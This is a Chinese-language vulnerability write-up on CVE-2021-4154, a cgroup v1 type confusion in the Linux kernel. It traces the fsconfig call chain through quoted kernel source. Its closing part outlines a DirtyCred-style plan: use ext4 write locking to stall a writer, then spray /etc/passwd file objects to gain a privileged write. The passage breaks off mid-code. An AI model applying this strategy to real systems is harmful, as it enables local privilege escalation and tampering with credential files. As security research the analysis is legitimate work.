[CVE] cgroup CVE-2021-4154漏洞分析

🥲

CVE-2021-4154漏洞分析

简述

kernel/cgroup/cgroup-v1.c 的 cgroup1_parse_param()函数存在类型混淆，导致UAF漏洞。可以调用syscall fsconfig 设置任意的 fd，最终关闭该文件后 fd 对应 file 对象会被释放。通过对该漏洞的利用可能会造成本地提权的后果

影响版本: linux kernel < 5.14-rc2 (主线在 5.14-rc2 合入修复补丁; 本文分析所用的 v5.11 仍然受影响)

漏洞分析

调用链溯源

选用源码版本v5.11。从漏洞文档得知，漏洞存在于kernel/cgroup/cgroup-v1.c的cgroup1_parse_param()中。首要问题就是查清调用链，溯源回源头，看到底是谁调用了这个函数；当然第一步还是先找到目标函数

现在先不忙分析毕竟所有的参数什么的都不清楚包括分支如何流向都不清楚还是要先溯源回顶层函数这个时候vscode已经承担不住查找引用的功能了使用源码在线网站进行分析可以看到cgroup1_parse_param只被引用到了kernel/cgroup/cgroup.c中

可以看到在cgroup.c中定义了一个类似file_operations函数表的结构cgroup1_fs_context_ops，其中的.parse_param引用了cgroup1_parse_param

那么继续追.parse_param 乍一看有27个引用但是细细筛查一下发现其实没有那么多以arch/*/inode.c开头的是关于不同架构的inode.c只需要看一个即可 fs/*/super.c同理是不同文件格式的super.c只需要看一个即可以此类推可以省略大部分引用不看

经过查看大部分引用是如同/mm/shmem.c中一样只是重定义fs_context_operations这个结构体然后定义对应情况的函数表

真正关键的位置在/fs/fs_context.c中，可以看到在146行的位置有一个调用是fc->ops->parse_param()，其中fc是参数且结构为fs_context。这个结构比较熟悉了，可以看到其ops属性就是fs_context_operations结构体，那么cgroup1_fs_context_ops中的parse_param便是在此处由vfs_parse_fs_param调用

继续查看vfs_parse_fs_param的引用，有三个，需要一一排查。但是有一个注意点：利用漏洞肯定需要参数是可控的，参数不可控的路径就一定不是我们寻找的调用链

首先来看fs/fs_context.c，其中161行是vfs_parse_fs_param本身导出函数的痕迹，而184行的调用传递的参数param是在vfs_parse_fs_string函数内部定义的，外部不可控，故排除此路径

然后来看/fs/nfs/nfs4super.c 188行很明显此处调用传递的param也是函数内部定义的排除此路径

那么只剩一条路径了fs/fsopen.c 这次就更明显了在调用vfs_parse_fs_param时传递进函数的param正是调用vfs_fsconfig_locked的参数param 那么确定vfs_parse_fs_param的上层路径为vfs_fsconfig_locked

继续上追这次只有一个引用且包含在系统调用fsconfig中很明显系统调用已经为最上层函数了即使有再上层的函数也无所谓了因为我们完全可以以此系统调用为切入点来控制程序流而不必寻找更上层的函数

至此函数调用链就明晰了为fsconfig() -> vfs_fsconfig_locked() -> vfs_parse_fs_param() -> cgroup1_parse_param() 接下来转入静态分析的工作

静态分析

函数调用链溯源是从下往上看的话那么静态分析就是从上往下分析了

首先来看fsconfig系统调用 在函数内部大量调用了结构体之前基本都分析过这里不再分析结构体直接给出定义方便查看其实经过阅读源码可以发现在系统调用内部并没有执行什么操作主要是针对不同的cmd值进行参数配置最终将配置好的参数param传入vfs_fsconfig_locked 此处函数没有分流看看就好

c
// include/linux/fs_context.h
/*
 * Filesystem configuration context.
 *
 * For this analysis the relevant members are:
 *   - ops:    its parse_param hook is what vfs_parse_fs_param() calls;
 *   - phase:  checked by vfs_fsconfig_locked() before parsing a parameter;
 *   - source: released with kfree() in put_fs_context().
 */
struct fs_context {
	const struct fs_context_operations *ops;
	struct mutex		uapi_mutex;	/* Userspace access mutex */
	struct file_system_type	*fs_type;
	void			*fs_private;	/* The filesystem's context */
	void			*sget_key;
	struct dentry		*root;		/* The root and superblock */
	struct user_namespace	*user_ns;	/* The user namespace for this mount */
	struct net		*net_ns;	/* The network namespace for this mount */
	const struct cred	*cred;		/* The mounter's credentials */
	struct p_log		log;		/* Logging buffer */
	const char		*source;	/* The source name (eg. dev path) */
	void			*security;	/* Linux S&M options */
	void			*s_fs_info;	/* Proposed s_fs_info */
	unsigned int		sb_flags;	/* Proposed superblock flags (SB_*) */
	unsigned int		sb_flags_mask;	/* Superblock flags that were changed */
	unsigned int		s_iflags;	/* OR'd with sb->s_iflags */
	unsigned int		lsm_flags;	/* Information flags from the fs to the LSM */
	enum fs_context_purpose	purpose:8;
	enum fs_context_phase	phase:8;	/* The phase the context is in */
	bool			need_free:1;	/* Need to call ops->free() */
	bool			global:1;	/* Goes into &init_user_ns */
	bool			oldapi:1;	/* Coming from mount(2) */
};

c
// include/linux/file.h
/*
 * Value returned by fdget()/fdget_pos() and released with fdput()/fdput_pos():
 * the looked-up struct file together with flag bits for the release side
 * (e.g. FDPUT_POS_UNLOCK, set in __fdget_pos()).
 */
struct fd {
	struct file *file;	/* NULL when the descriptor lookup failed */
	unsigned int flags;
};

c
// fs/fsopen.c
// FSCONFIG_SET_FLAG: No value is specified. The parameter must be boolean. The key may be prefixed with "no" to invert the setting. "_value" must be NULL and "aux" must be 0.
// FSCONFIG_SET_STRING: A string value is specified. The parameter may expect a boolean, an integer, a string or a path; conversion to the appropriate type is attempted (which may include looking up a path). "_value" points to a NUL-terminated string and "aux" must be 0.
// FSCONFIG_SET_BINARY: A binary blob is specified. "_value" points to the blob and "aux" is its size. The parameter must expect a blob.
// FSCONFIG_SET_PATH: A non-empty path is specified. The parameter must expect a path object. "_value" points to the NUL-terminated path string and "aux" is a file descriptor at which to start a relative lookup, or AT_FDCWD.
// FSCONFIG_SET_PATH_EMPTY: Same as FSCONFIG_SET_PATH, but with AT_EMPTY_PATH implied.
// FSCONFIG_SET_FD: An open file descriptor is specified. "_value" must be NULL and "aux" is the file descriptor.

SYSCALL_DEFINE5(fsconfig,
		int, fd,
		unsigned int, cmd,
		const char __user *, _key,
		const void __user *, _value,
		int, aux)
{
	struct fs_context *fc;
	struct fd f;
	int ret;
	int lookup_flags = 0;

	struct fs_parameter param = {
		.type	= fs_value_is_undefined,
	};

	if (fd < 0)
		return -EINVAL;

	// Validate the (_key, _value, aux) combination for each command
	switch (cmd) {
	case FSCONFIG_SET_FLAG:
		if (!_key || _value || aux)
			return -EINVAL;
		break;
	case FSCONFIG_SET_STRING:
		if (!_key || !_value || aux)
			return -EINVAL;
		break;
	...
	}

	f = fdget(fd); // look up the struct fd for the context descriptor
	if (!f.file)
		return -EBADF;
	ret = -EINVAL;
	// Only descriptors whose f_op is fscontext_fops are accepted
	if (f.file->f_op != &fscontext_fops)
		goto out_f;

	fc = f.file->private_data; // private_data of the file holds the struct fs_context
	// Contexts using the legacy ops reject the binary/path/fd commands
	if (fc->ops == &legacy_fs_context_ops) {
		switch (cmd) {
		case FSCONFIG_SET_BINARY:
		case FSCONFIG_SET_PATH:
		case FSCONFIG_SET_PATH_EMPTY:
		case FSCONFIG_SET_FD:
			ret = -EOPNOTSUPP;
			goto out_f;
		}
	}

	if (_key) {
		param.key = strndup_user(_key, 256);
		if (IS_ERR(param.key)) {
			ret = PTR_ERR(param.key);
			goto out_f;
		}
	}

	// Fill in param according to cmd before passing it to vfs_fsconfig_locked()
	switch (cmd) {
	case FSCONFIG_SET_FLAG:
		param.type = fs_value_is_flag;
		break;
	case FSCONFIG_SET_STRING:
		param.type = fs_value_is_string;
		param.string = strndup_user(_value, 256);
		if (IS_ERR(param.string)) {
			ret = PTR_ERR(param.string);
			goto out_key;
		}
		param.size = strlen(param.string);
		break;
	...
	case FSCONFIG_SET_FD:
		// param.file shares storage with param.string (union in struct
		// fs_parameter); only param.type tells the two apart.
		param.type = fs_value_is_file;
		ret = -EBADF;
		param.file = fget(aux);
		if (!param.file)
			goto out_key;
		break;
	default:
		break;
	}

	ret = mutex_lock_interruptible(&fc->uapi_mutex);
	if (ret == 0) {
		ret = vfs_fsconfig_locked(fc, cmd, &param);
		mutex_unlock(&fc->uapi_mutex);
	}

	/* Clean up the our record of any value that we obtained from
	 * userspace.  Note that the value may have been stolen by the LSM or
	 * filesystem, in which case the value pointer will have been cleared.
	 */
	switch (cmd) {
	case FSCONFIG_SET_STRING:
	case FSCONFIG_SET_BINARY:
		kfree(param.string);
		break;
	case FSCONFIG_SET_PATH:
	case FSCONFIG_SET_PATH_EMPTY:
		if (param.name)
			putname(param.name);
		break;
	case FSCONFIG_SET_FD:
		if (param.file)
			fput(param.file);
		break;
	default:
		break;
	}
out_key:
	kfree(param.key);
out_f:
	fdput(f);
	return ret;
}

接下来进入vfs_fsconfig_locked 可以看到函数内部根据参数cmd和fc->phase来进行分流我们的目的是让程序流向vfs_parse_fs_param所以要求cmd != FSCONFIG_CMD_CREATE && cmd != FSCONFIG_CMD_RECONFIGURE 然后是fc->phase的问题即当前上下文的阶段通过查看其定义发现有7种状态当然这些状态我们也是不可控的只做了解即可不必深究

c
/*
 * Userspace usage phase for fsopen/fspick.
 *
 * vfs_fsconfig_locked() only forwards a parameter to vfs_parse_fs_param()
 * while the context is in FS_CONTEXT_CREATE_PARAMS or
 * FS_CONTEXT_RECONF_PARAMS; any other phase yields -EBUSY.
 */
enum fs_context_phase {
	FS_CONTEXT_CREATE_PARAMS,	/* Loading params for sb creation */
	FS_CONTEXT_CREATING,		/* A superblock is being created */
	FS_CONTEXT_AWAITING_MOUNT,	/* Superblock created, awaiting fsmount() */
	FS_CONTEXT_AWAITING_RECONF,	/* Awaiting initialisation for reconfiguration */
	FS_CONTEXT_RECONF_PARAMS,	/* Loading params for reconfiguration */
	FS_CONTEXT_RECONFIGURING,	/* Reconfiguring the superblock */
	FS_CONTEXT_FAILED,		/* Failed to correctly transition a context */
};

c
// fs/fsopen.c
/*
 * Execute one fsconfig() command on @fc. The fsconfig() syscall calls this
 * with fc->uapi_mutex held.
 *
 * FSCONFIG_CMD_CREATE and FSCONFIG_CMD_RECONFIGURE have dedicated branches
 * (elided in this excerpt); every other command is treated as "set a
 * parameter" and forwarded to vfs_parse_fs_param().
 *
 * Returns 0 or a negative errno; -EBUSY when a parameter is supplied while
 * the context is not in a *_PARAMS phase.
 */
static int vfs_fsconfig_locked(struct fs_context *fc, int cmd,
			       struct fs_parameter *param)
{
	struct super_block *sb;
	int ret;

	ret = finish_clean_context(fc);
	if (ret)
		return ret;
	switch (cmd) {
	case FSCONFIG_CMD_CREATE:
		...
		return 0;
	case FSCONFIG_CMD_RECONFIGURE:
		...
		vfs_clean_context(fc);
		return 0;
	default:
		/* Parameters are only accepted while the context is loading params. */
		if (fc->phase != FS_CONTEXT_CREATE_PARAMS &&
		    fc->phase != FS_CONTEXT_RECONF_PARAMS)
			return -EBUSY;

		return vfs_parse_fs_param(fc, param);
	}
	fc->phase = FS_CONTEXT_FAILED;
	return ret;
}

跟进vfs_parse_fs_param 这里也是没什么要求只要求param->key不为空

c
/*
 * Offer one parameter to, in order: the generic superblock-flag parser, the
 * LSM hook, and the filesystem's own ->parse_param(). Each stage returns
 * -ENOPARAM to pass the parameter on to the next one; any other value ends
 * processing and is returned to the caller.
 *
 * If no stage claims the parameter, "source" gets default handling here,
 * which (unlike cgroup1_parse_param()) does verify that the value is a string.
 */
int vfs_parse_fs_param(struct fs_context *fc, struct fs_parameter *param)
{
	int ret;

	if (!param->key) // the parameter must carry a key
		return invalf(fc, "Unnamed parameter\n");

	ret = vfs_parse_sb_flag(fc, param->key);
	if (ret != -ENOPARAM)
		return ret;

	ret = security_fs_context_parse_param(fc, param);
	if (ret != -ENOPARAM)
		/* Param belongs to the LSM or is disallowed by the LSM; so
		 * don't pass to the FS.
		 */
		return ret;

	if (fc->ops->parse_param) {
		ret = fc->ops->parse_param(fc, param);
		if (ret != -ENOPARAM)
			return ret;
	}

	/* If the filesystem doesn't take any arguments, give it the
	 * default handling of source.
	 */
	if (strcmp(param->key, "source") == 0) {
		if (param->type != fs_value_is_string)
			return invalf(fc, "VFS: Non-string source");
		if (fc->source)
			return invalf(fc, "VFS: Multiple sources");
		fc->source = param->string;
		param->string = NULL;
		return 0;
	}

	return invalf(fc, "%s: Unknown parameter '%s'",
		      fc->fs_type->name, param->key);
}

而param->key的设置是在最开始的fsconfig系统调用内很显然如果param->key不为空要求参数_key不为空即可 strndup_user按照函数名理解是和用户空间的strndup一个效果即字符串复制

c
SYSCALL_DEFINE5(fsconfig,
		int, fd,
		unsigned int, cmd,
		const char __user *, _key,
		const void __user *, _value,
		int, aux)
{
	...
	if (fd < 0)
		return -EINVAL;

	switch (cmd) {
	case FSCONFIG_SET_FLAG:
		if (!_key || _value || aux)
			return -EINVAL;
		break;
	...
	default:
		return -EOPNOTSUPP;
	}

	...

	if (_key) {
		param.key = strndup_user(_key, 256);
		if (IS_ERR(param.key)) {
			ret = PTR_ERR(param.key);
			goto out_f;
		}
	}
	...

跟进最终函数cgroup1_parse_param，其实漏洞也很明显：当param->key == "source"时，会直接将param->string赋值给fc->source，但是却没有对param->type进行校验

c
/*
 * cgroup v1 ->parse_param() hook (excerpt).
 *
 * When fs_parse() does not recognise the key (-ENOPARAM) and the key is
 * "source", the value pointer is moved into fc->source.
 */
int cgroup1_parse_param(struct fs_context *fc, struct fs_parameter *param)
{
	struct cgroup_fs_context *ctx = cgroup_fc2context(fc);
	struct cgroup_subsys *ss;
	struct fs_parse_result result;
	int opt, i;

	opt = fs_parse(fc, cgroup1_fs_parameters, param, &result);
	if (opt == -ENOPARAM) {
		if (strcmp(param->key, "source") == 0) {
			if (fc->source)
				return invalf(fc, "Multiple sources not supported");
			/*
			 * BUG (CVE-2021-4154): param->type is never checked, so the
			 * union member read here may actually be a struct file *
			 * (FSCONFIG_SET_FD) rather than a string.
			 */
			fc->source = param->string;
			/* Clearing the pointer makes fsconfig() skip its own cleanup. */
			param->string = NULL;
			return 0;
		}
		...
	}
	return 0;
}

回到最开始的系统调用处，我们看看param->type有什么作用。可以看到根据不同的cmd值对param.type赋不同的值，很明显cgroup1_parse_param对"source"的处理应当只针对param.type == fs_value_is_string的情况，因为只有在这种情况下param.string才是一个有效的字符串指针

c
...
switch (cmd) {
	case FSCONFIG_SET_FLAG:
		param.type = fs_value_is_flag;
		break;
	case FSCONFIG_SET_STRING:
		param.type = fs_value_is_string;
		param.string = strndup_user(_value, 256);
		if (IS_ERR(param.string)) {
			ret = PTR_ERR(param.string);
			goto out_key;
		}
		param.size = strlen(param.string);
		break;
	case FSCONFIG_SET_BINARY:
		param.type = fs_value_is_blob;
		param.size = aux;
		param.blob = memdup_user_nul(_value, aux);
		if (IS_ERR(param.blob)) {
			ret = PTR_ERR(param.blob);
			goto out_key;
		}
		break;
	case FSCONFIG_SET_PATH_EMPTY:
		lookup_flags = LOOKUP_EMPTY;
		fallthrough;
	case FSCONFIG_SET_PATH:
		param.type = fs_value_is_filename;
		param.name = getname_flags(_value, lookup_flags, NULL);
		if (IS_ERR(param.name)) {
			ret = PTR_ERR(param.name);
			goto out_key;
		}
		param.dirfd = aux;
		param.size = strlen(param.name->name);
		break;
	case FSCONFIG_SET_FD:
		param.type = fs_value_is_file;
		ret = -EBADF;
		param.file = fget(aux);
		if (!param.file)
			goto out_key;
		break;
	default:
		break;
	}
...

但是如果看一看param结构的定义也即fs_parameter会发现对于string blob name file是一个联合类型也很合理毕竟按理来说一个param只有一个类型也只能使用这四个属性中的一个所以组成联合类型也没错但是关键点在于如果我们的param.type是fs_value_is_file呢?

c
/*
 * One configuration parameter as built by fsconfig().
 *
 * string, blob, name and file are members of one anonymous union and thus
 * occupy the same storage; `type` is the only indication of which member is
 * valid.
 */
struct fs_parameter {
	const char		*key;		/* Parameter name */
	enum fs_value_type	type:8;		/* The type of value here */
	union {
		char		*string;
		void		*blob;
		struct filename	*name;
		struct file	*file;
	};
	size_t	size;
	int	dirfd;
};

根据fsconfig中的源码如果cmd == FSCONFIG_SET_FD那么在param.file处存放的是aux的file结构体而param.file和param.string的偏移是相同的也就是系统不根据param.type的话根本分不清到底数据是param.string还是param.file

c
case FSCONFIG_SET_FD:
		param.type = fs_value_is_file;
		ret = -EBADF;
		param.file = fget(aux);
		if (!param.file)
			goto out_key;
		break;

那么等到了cgroup1_parse_param处时就会有大问题

c
/*
 * Same excerpt as above, revisited for the FSCONFIG_SET_FD case: here
 * param->string aliases param->file, so a struct file pointer ends up in
 * fc->source.
 */
int cgroup1_parse_param(struct fs_context *fc, struct fs_parameter *param)
{
	struct cgroup_fs_context *ctx = cgroup_fc2context(fc);
	struct cgroup_subsys *ss;
	struct fs_parse_result result;
	int opt, i;

	opt = fs_parse(fc, cgroup1_fs_parameters, param, &result);
	if (opt == -ENOPARAM) {
		if (strcmp(param->key, "source") == 0) {
			if (fc->source)
				return invalf(fc, "Multiple sources not supported");
			/* Type confusion: no check that param->type is fs_value_is_string. */
			fc->source = param->string;
			param->string = NULL;
			return 0;
		}
		...
	}
	return 0;
}

这里的fc->source = param->string会直接将aux对应的file结构体指针赋值到fs_context的source属性中，也即将aux的file结构体存放到了fd对应的fs_context中。那么等到释放fd的时候，如果调用了kfree(fc->source)，就会把一个仍被文件描述符表引用的file结构体释放掉，造成UAF漏洞

close分析

那么就是接下来看看关闭文件描述符fd的时候会不会造成UAF了众所周知close()其实是系统调用sys_close 很明显调用了close_fd()

c
// fs/open.c
/*
 * close(2): delegates to close_fd() and maps the restart error codes to
 * -EINTR, since the descriptor slot is already cleared and the call cannot
 * be restarted.
 */
SYSCALL_DEFINE1(close, unsigned int, fd)
{
	int retval = close_fd(fd);

	/* can't restart close syscall because file table entry was cleared */
	if (unlikely(retval == -ERESTARTSYS ||
		     retval == -ERESTARTNOINTR ||
		     retval == -ERESTARTNOHAND ||
		     retval == -ERESTART_RESTARTBLOCK))
		retval = -EINTR;

	return retval;
}

c
// fs/file.c
/*
 * Take the struct file for @fd out of the current task's file table via
 * pick_file() and close it with filp_close(). Returns -EBADF if the lookup
 * yields no file.
 */
int close_fd(unsigned fd)
{
	struct files_struct *files = current->files;
	struct file *file;

	file = pick_file(files, fd);
	if (!file)
		return -EBADF;

	return filp_close(file, files);
}

c
// fs/open.c
/*
 * Close one reference to @filp: call ->flush() if the file has one, drop
 * dnotify/POSIX-lock state for non-O_PATH files, then release the reference
 * with fput(). Returns the ->flush() result (0 when there is no ->flush()).
 */
int filp_close(struct file *filp, fl_owner_t id)
{
	int retval = 0;

	if (!file_count(filp)) {
		printk(KERN_ERR "VFS: Close: file count is 0\n");
		return 0;
	}

	if (filp->f_op->flush)
		retval = filp->f_op->flush(filp, id);

	if (likely(!(filp->f_mode & FMODE_PATH))) {
		dnotify_flush(filp, id);
		locks_remove_posix(filp, id);
	}
	fput(filp);
	return retval;
}

c
// fs/file_table.c
/* Drop a single reference to @file; thin wrapper around fput_many(). */
void fput(struct file *file)
{
	fput_many(file, 1);
}

c
// fs/file_table.c
/*
 * Drop @refs references to @file. Only when the count reaches zero is the
 * final teardown (____fput -> __fput) scheduled; it is not executed inline
 * here.
 */
void fput_many(struct file *file, unsigned int refs)
{
	if (atomic_long_sub_and_test(refs, &file->f_count)) {
		struct task_struct *task = current;

		if (likely(!in_interrupt() && !(task->flags & PF_KTHREAD))) {
			init_task_work(&file->f_u.fu_rcuhead, ____fput);
			/*
			 * Queue ____fput as task work on the *current* task
			 * (task == current) - no new thread is created.
			 * Presumably it runs when this task returns to user
			 * mode (TWA_RESUME) - confirm against task_work docs.
			 */
			if (!task_work_add(task, &file->f_u.fu_rcuhead, TWA_RESUME))
				return;
			/*
			 * After this task has run exit_task_work(),
			 * task_work_add() will fail.  Fall through to delayed
			 * fput to avoid leaking *file.
			 */
		}

		if (llist_add(&file->f_u.fu_llist, &delayed_fput_list))
			schedule_delayed_work(&delayed_fput_work, 1);
	}
}

c
// fs/file_table.c
/*
 * Task-work callback registered by fput_many(): recovers the struct file
 * that embeds @work and hands it to __fput().
 */
static void ____fput(struct callback_head *work)
{
	__fput(container_of(work, struct file, f_u.fu_rcuhead));
}

c
// fs/file_table.c
/*
 * Final teardown of a struct file (excerpt). The step that matters for this
 * analysis is the call to the file's ->release() method, which for an
 * fscontext file is fscontext_release().
 */
static void __fput(struct file *file)
{
	struct dentry *dentry = file->f_path.dentry;
	struct vfsmount *mnt = file->f_path.mnt;
	struct inode *inode = file->f_inode;
	fmode_t mode = file->f_mode;

	...
	if (unlikely(file->f_flags & FASYNC)) {
		if (file->f_op->fasync)
			file->f_op->fasync(-1, file, 0);
	}
	/* Per-file-type release hook. */
	if (file->f_op->release)
		file->f_op->release(inode, file);
	...
}

卧槽终于找到了close的整体调用链是close() -> sys_close() -> close_fd() -> filp_close() -> fput() -> fput_many() -> ____fput() -> __fput -> file.f_op.release

那么回到主题fsconfig中在fsconfig源码中有一句f.file->f_op != &fscontext_fops 也就是强制限制了file.f_op == &fscontext_fops

c
/*
 * fsconfig() excerpt reduced to the descriptor check: anything whose f_op is
 * not fscontext_fops is rejected with -EINVAL, so the context file's
 * ->release() is always fscontext_release().
 */
SYSCALL_DEFINE5(fsconfig,
		int, fd,
		unsigned int, cmd,
		const char __user *, _key,
		const void __user *, _value,
		int, aux)
{
	struct fs_context *fc;
	struct fd f;
	int ret;
	int lookup_flags = 0;
	...
	if (fd < 0)
		return -EINVAL;
	switch (cmd) {
	case FSCONFIG_SET_FLAG:
		if (!_key || _value || aux)
			return -EINVAL;
		break;
	...
	default:
		return -EOPNOTSUPP;
	}

	f = fdget(fd);
	if (!f.file)
		return -EBADF;
	ret = -EINVAL;
	/* Only fscontext files are accepted as the first argument. */
	if (f.file->f_op != &fscontext_fops)
		goto out_f;
out_f:
	fdput(f);
	return ret;
}

而fscontext_fops中的release为函数fscontext_release

c
// fs/fsopen.c
/*
 * File operations of an fscontext file; ->release() is the hook reached from
 * __fput() when the last reference goes away.
 */
const struct file_operations fscontext_fops = {
	.read		= fscontext_read,
	.release	= fscontext_release,
	.llseek		= no_llseek,
};

c
/*
 * ->release() for fscontext files: detaches the fs_context from the file and
 * drops it through put_fs_context(). Always returns 0.
 */
static int fscontext_release(struct inode *inode, struct file *file)
{
	struct fs_context *fc = file->private_data;

	if (fc) {
		file->private_data = NULL;
		put_fs_context(fc);
	}
	return 0;
}

继续跟进put_fs_context，可以看到函数的倒数第二行调用了kfree(fc->source)，证明UAF漏洞存在

c
/*
 * Tear down a filesystem context: release the root/superblock if present,
 * call the filesystem's ->free() hook when requested, drop the namespace,
 * credential, log and fs_type references, then free fc->source and the
 * context itself.
 */
void put_fs_context(struct fs_context *fc)
{
	struct super_block *sb;

	if (fc->root) {
		sb = fc->root->d_sb;
		dput(fc->root);
		fc->root = NULL;
		deactivate_super(sb);
	}

	if (fc->need_free && fc->ops && fc->ops->free)
		fc->ops->free(fc);

	security_free_mnt_opts(&fc->security);
	put_net(fc->net_ns);
	put_user_ns(fc->user_ns);
	put_cred(fc->cred);
	put_fc_log(fc);
	put_filesystem(fc->fs_type);
	/*
	 * fc->source is assumed to be a kmalloc'ed string. After the type
	 * confusion in cgroup1_parse_param() it can instead point at a live
	 * struct file, which is then freed here.
	 */
	kfree(fc->source);
	kfree(fc);
}

漏洞利用

上面漏洞分析很复杂但是利用起来思路相当的直接造成了UAF之后虽然file1的File结构体被释放但是其指针仍然指向当前位置那么如果在此时喷射大量高权限的File结构体的话就有可能对其进行写入这也就是上篇文章DirtyCred: Escalating Privilege in Linux Kernel的思想

按照DirtyCred第5节所说，在kernel v4.13之前对文件进行写入的流程是 鉴权 -> 从用户空间读取数据 -> 写入文件。中间"从用户空间读取数据"这一步能玩的花样可太多了，可以利用FUSE或者userfaultfd暂停执行。放到当前漏洞中就是 file1开始写入动作(file1的File结构体被释放过了) -> 鉴权通过(写自己的文件肯定通过) -> 从用户空间读取数据 -> 被暂停执行 -> 喷射只读文件file2 -> file2的File结构体覆盖到原file1的File结构体处 -> 恢复执行 -> file1写入到file2中，这样就完成了一次越权写入

但是很可惜，在kernel v4.13之后对于文件写入的流程就变了，修改为 从用户空间读取数据 -> 鉴权 -> 写入文件，这样就修复了之前暂停执行的利用手法；并且自kernel v5.11起，默认禁止非特权用户使用userfaultfd处理内核态触发的缺页

所以按照DirtyCred的思想可以利用文件系统的特性(甚至都不算BUG)来实现和之前一样的效果那就是锁

这里就拿我们最熟悉的老朋友ext4来说可以从其函数表看出写入文件时使用的函数是ext4_file_write_iter

c
// fs/ext4/file.c
/*
 * File operations for regular ext4 files. Writes go through ->write_iter,
 * i.e. ext4_file_write_iter().
 */
const struct file_operations ext4_file_operations = {
	.llseek		= ext4_llseek,
	.read_iter	= ext4_file_read_iter,
	.write_iter	= ext4_file_write_iter,
	.iopoll		= iomap_dio_iopoll,
	.unlocked_ioctl = ext4_ioctl,
#ifdef CONFIG_COMPAT
	.compat_ioctl	= ext4_compat_ioctl,
#endif
	.mmap		= ext4_file_mmap,
	.mmap_supported_flags = MAP_SYNC,
	.open		= ext4_file_open,
	.release	= ext4_release_file,
	.fsync		= ext4_sync_file,
	.get_unmapped_area = thp_get_unmapped_area,
	.splice_read	= generic_file_splice_read,
	.splice_write	= iter_file_splice_write,
	.fallocate	= ext4_fallocate,
};

如果我们只是正常的文件写的话很明显在ext4_file_write_iter内调用的是ext4_buffered_write_iter

c
/*
 * ext4 ->write_iter entry point: picks the DAX, direct-I/O or buffered write
 * path. A write on a non-DAX inode without IOCB_DIRECT takes the buffered
 * path.
 */
static ssize_t
ext4_file_write_iter(struct kiocb *iocb, struct iov_iter *from)
{
	struct inode *inode = file_inode(iocb->ki_filp);

	if (unlikely(ext4_forced_shutdown(EXT4_SB(inode->i_sb))))
		return -EIO;

#ifdef CONFIG_FS_DAX
	if (IS_DAX(inode))
		return ext4_dax_write_iter(iocb, from);
#endif
	if (iocb->ki_flags & IOCB_DIRECT)
		return ext4_dio_write_iter(iocb, from);
	else
		return ext4_buffered_write_iter(iocb, from);
}

很明显在调用真正写入函数generic_perform_write之前有一个inode_lock(inode)的操作实际上通过操作系统的知识可以得知这是一个很正常的操作毕竟为了保证写入数据的稳定肯定不能让多个进程同时写一个文件那么这个等待锁的操作其实也是变相实现了停止执行的操作根据DirtyCred描述如果需要写入4G的数据即可等待数十秒足够进行喷射了

c
/*
 * Buffered write path. The inode lock is taken before the write checks and
 * held across generic_perform_write(), so a second writer to the same inode
 * blocks in inode_lock() until the first writer finishes.
 */
static ssize_t ext4_buffered_write_iter(struct kiocb *iocb,
					struct iov_iter *from)
{
	ssize_t ret;
	struct inode *inode = file_inode(iocb->ki_filp);

	if (iocb->ki_flags & IOCB_NOWAIT)
		return -EOPNOTSUPP;

	ext4_fc_start_update(inode);
	inode_lock(inode);	/* serialises writers on this inode */
	ret = ext4_write_checks(iocb, from);
	if (ret <= 0)
		goto out;

	current->backing_dev_info = inode_to_bdi(inode);
	/* The data is written through iocb->ki_filp, read here after the lock was taken. */
	ret = generic_perform_write(iocb->ki_filp, from, iocb->ki_pos);
	current->backing_dev_info = NULL;

out:
	inode_unlock(inode);
	ext4_fc_stop_update(inode);
	if (likely(ret > 0)) {
		iocb->ki_pos += ret;
		ret = generic_write_sync(iocb, ret);
	}

	return ret;
}

那么目前的利用思路就是设置三个线程Thread1 Thread2 Thread3 其中Thread1正常打开一个可写文件往其内部写入大量数据 Thread2打开和Thread1一样的文件往其内部写入恶意语句 但是由于Thread1占用了锁所以需要等待 Thread3利用漏洞kfree掉Thread2的File结构体然后大量喷射/etc/passwd结构体使其覆盖Thread2的结构体然后等待Thread1释放锁因为Thread2在等待锁之前已经完成鉴权所以在获得锁之后就会直接写入造成越权写

但是这里有一个细节问题在进入到各个文件类型真正的写函数之前统一的调用入口肯定是系统调用write

c
// fs/read_write.c
/* write(2): forwards its arguments unchanged to ksys_write(). */
SYSCALL_DEFINE3(write, unsigned int, fd, const char __user *, buf,
		size_t, count)
{
	return ksys_write(fd, buf, count);
}

坏就坏在这个fdget_pos函数上了

c
// fs/read_write.c
/*
 * Body of write(2): resolve @fd with fdget_pos() (which may take
 * f_pos_lock), run vfs_write() on a local copy of the file position, store
 * the position back on success, and release the descriptor.
 * Returns bytes written or a negative errno (-EBADF if @fd is not open).
 */
ssize_t ksys_write(unsigned int fd, const char __user *buf, size_t count)
{
	struct fd f = fdget_pos(fd);
	ssize_t ret = -EBADF;

	if (f.file) {
		loff_t pos, *ppos = file_ppos(f.file);
		if (ppos) {
			/* Work on a local copy so f_pos only changes on success. */
			pos = *ppos;
			ppos = &pos;
		}
		ret = vfs_write(f.file, buf, count, ppos);
		if (ret >= 0 && ppos)
			f.file->f_pos = pos;
		fdput_pos(f);
	}

	return ret;
}

c
// include/linux/file.h
/* Convert the packed result of __fdget_pos() into a struct fd. */
static inline struct fd fdget_pos(int fd)
{
	return __to_fd(__fdget_pos(fd));
}

可以看到在fdget_pos内还有一个锁：如果file->f_mode带有FMODE_ATOMIC_POS标志，且该file结构体的引用计数大于1，那么进程之间会竞争file->f_pos_lock锁，但是此时还没到鉴权这一步呢!

c
/*
 * Like __fdget(), but additionally takes file->f_pos_lock when the file has
 * FMODE_ATOMIC_POS set and more than one reference. The return value packs
 * the struct file pointer with flag bits in its low two bits;
 * FDPUT_POS_UNLOCK records that the lock was taken.
 */
unsigned long __fdget_pos(unsigned int fd)
{
	unsigned long v = __fdget(fd);
	struct file *file = (struct file *)(v & ~3);	/* strip the flag bits */

	if (file && (file->f_mode & FMODE_ATOMIC_POS)) {
		if (file_count(file) > 1) {
			v |= FDPUT_POS_UNLOCK;
			mutex_lock(&file->f_pos_lock);
		}
	}
	return v;
}

鉴权操作是在vfs_write中

c
// fs/read_write.c
/*
 * Repeated for reference: fdget_pos() (and thus any wait on f_pos_lock)
 * happens before vfs_write(), which is where the FMODE_WRITE check lives.
 */
ssize_t ksys_write(unsigned int fd, const char __user *buf, size_t count)
{
	struct fd f = fdget_pos(fd);
	ssize_t ret = -EBADF;

	if (f.file) {
		loff_t pos, *ppos = file_ppos(f.file);
		if (ppos) {
			pos = *ppos;
			ppos = &pos;
		}
		ret = vfs_write(f.file, buf, count, ppos);
		if (ret >= 0 && ppos)
			f.file->f_pos = pos;
